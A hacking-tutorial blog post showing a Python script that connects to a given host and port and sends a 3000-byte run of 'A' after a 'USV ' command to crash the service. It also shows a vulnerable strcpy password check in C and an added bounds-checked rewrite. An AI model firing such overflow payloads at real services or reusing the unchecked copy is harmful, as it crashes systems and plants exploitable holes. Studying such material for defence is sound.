www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

About Author

Muhammad Shahroze Rashid
i4info
Web Developer
Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Auditor, a keen Security researcher.
How to exploit remote buffer overflow with python

20160924

Post by Admin

In this article we are going to write an exploit that overflows the buffer from the client side.

Step by Step Coding Remote Buffer Overflow Exploit with Python:


import socket
import sys

# Read the -s <host> and -p <port> command-line arguments.
for carg in sys.argv:
    if carg == "-s":
        argnum = sys.argv.index(carg)
        argnum += 1
        host = sys.argv[argnum]
    elif carg == "-p":
        argnum = sys.argv.index(carg)
        argnum += 1
        port = int(sys.argv[argnum])  # connect() needs an integer port

# 3000 bytes of 0x41 ("A")
buffer = b"\x41" * 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(b"USV " + buffer + b"\r\n\r")
s.close()

Code should look like this:

[Image: buffer_overflow_exp1]

Now, let's analyze the code. We already know the argument identification script from my previous tutorial. The next line makes a buffer, that is \x41 multiplied 3000 times. Then we see the lines that declare s as a socket, connect with it, send the buffer and close the socket. It looks pretty hard, but it isn't.

After you have done the steps above, it's time to test out our script!

[Image: buffer_overflow_exp2]

This depends on the programming language. For example, in C, you can be vulnerable to a remote buffer overflow if you use code like this:

int authed = 0;
char password_buffer[16];
/* strcpy() copies until the terminating NUL and never checks the size of password_buffer */
strcpy(password_buffer, your_password);
if (strcmp(password_buffer, password) == 0) {
    authed = 1;
}
else {
    authed = 0;
}

So, once your_password is over 16 characters, the copy runs past the end of password_buffer and can overwrite authed (an auth overflow), and if there is even more input, you get a buffer overflow with a segmentation fault error.

Take your time to comment on this article.
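A hardened form of the C password check above, as an added example that is not part of the original post. The function name check_password, the PASSWORD_BUF_SIZE macro and the sample strings are assumptions made for illustration; the 16-byte buffer matches the snippet in the post.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PASSWORD_BUF_SIZE 16  /* same size as password_buffer in the post */

/* Hypothetical helper: returns 1 when your_password equals password, else 0.
 * Input that does not fit the buffer (including its NUL) is rejected
 * before any copy, so nothing next to the buffer can be overwritten. */
int check_password(const char *your_password, const char *password)
{
    char password_buffer[PASSWORD_BUF_SIZE];
    size_t len;

    if (your_password == NULL || password == NULL)
        return 0;

    /* Bounded length scan: never reads more than PASSWORD_BUF_SIZE bytes. */
    for (len = 0; len < PASSWORD_BUF_SIZE && your_password[len] != '\0'; len++)
        ;

    /* 16 or more characters would need 17+ bytes with the NUL: refuse. */
    if (len >= PASSWORD_BUF_SIZE)
        return 0;

    /* Copy exactly len characters plus the terminating NUL. */
    memcpy(password_buffer, your_password, len + 1);

    return strcmp(password_buffer, password) == 0;
}

int main(void)
{
    /* Constructed sample inputs, including a 3000-byte run of 'A'
     * like the buffer the Python script sends. */
    static char big[3001];
    memset(big, 'A', 3000);
    big[3000] = '\0';

    printf("correct password : %d\n", check_password("secret", "secret"));
    printf("wrong password   : %d\n", check_password("wrong", "secret"));
    printf("3000 x 'A'       : %d\n", check_password(big, "secret"));
    return 0;
}
```

With this check the oversized input is refused instead of overwriting authed or crashing the process; passwords of 16 characters or more can never match, so size the buffer to the longest password the service accepts.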